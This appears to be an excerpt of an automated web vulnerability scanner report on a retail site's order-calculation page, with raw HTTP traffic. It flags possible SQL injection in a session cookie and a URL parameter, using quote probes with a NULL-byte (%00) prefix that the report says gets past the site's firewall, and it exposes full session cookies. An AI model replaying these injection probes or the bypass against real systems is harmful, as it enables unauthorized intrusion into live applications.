Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388%2527%2527; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 2

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 16 Jun 2011 12:05:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:05:41 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308225940857%3a%3bC25%5fEXP%3d1360065940%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:05:40 GMT;Path=/


1.67. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [THD_SESSION cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.homedepot.com
Path:   /webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The THD_SESSION cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the THD_SESSION cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%00'; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 1

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Length: 207104
Expires: Thu, 16 Jun 2011 12:01:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:01:58 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308225713377%3a%3bC25%5fEXP%3d1360065713%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:01:53 GMT;Path=/
Set-Cookie: THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1%3a%3bC6%3d%7b%22I1%22%3a%22216%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%24303%2c184%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d%2d1;Domain=.homedepot.com;Path=/
Set-Cookie: WC_PERSISTENT=UopgfbPd%2fmEDQfcSlDPV6CnKqYg%3d%0a%3b2011%2d06%2d16+08%3a01%3a54%2e903%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051;Domain=.homedepot.com;Expires=Mon, 14-Jan-2013 23:05:22 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308229314903%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2c65as3nloeuUkFpo3rPEkV2KC330%3d;Domain=.homedepot.com;Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xm
...[SNIP]...
<!-- Stores\Web Content\GenericError.jsp -->
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%00''; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 2

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 16 Jun 2011 12:01:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:01:59 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308225718513%3a%3bC25%5fEXP%3d1360065718%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:01:58 GMT;Path=/


1.68. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [URL parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.homedepot.com
Path:   /webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The URL parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the URL parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc%00'&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 1

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Length: 207104
Expires: Thu, 16 Jun 2011 11:51:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:51:47 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225096227%3a%3bC25%5fEXP%3d1360065096%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:51:36 GMT;Path=/
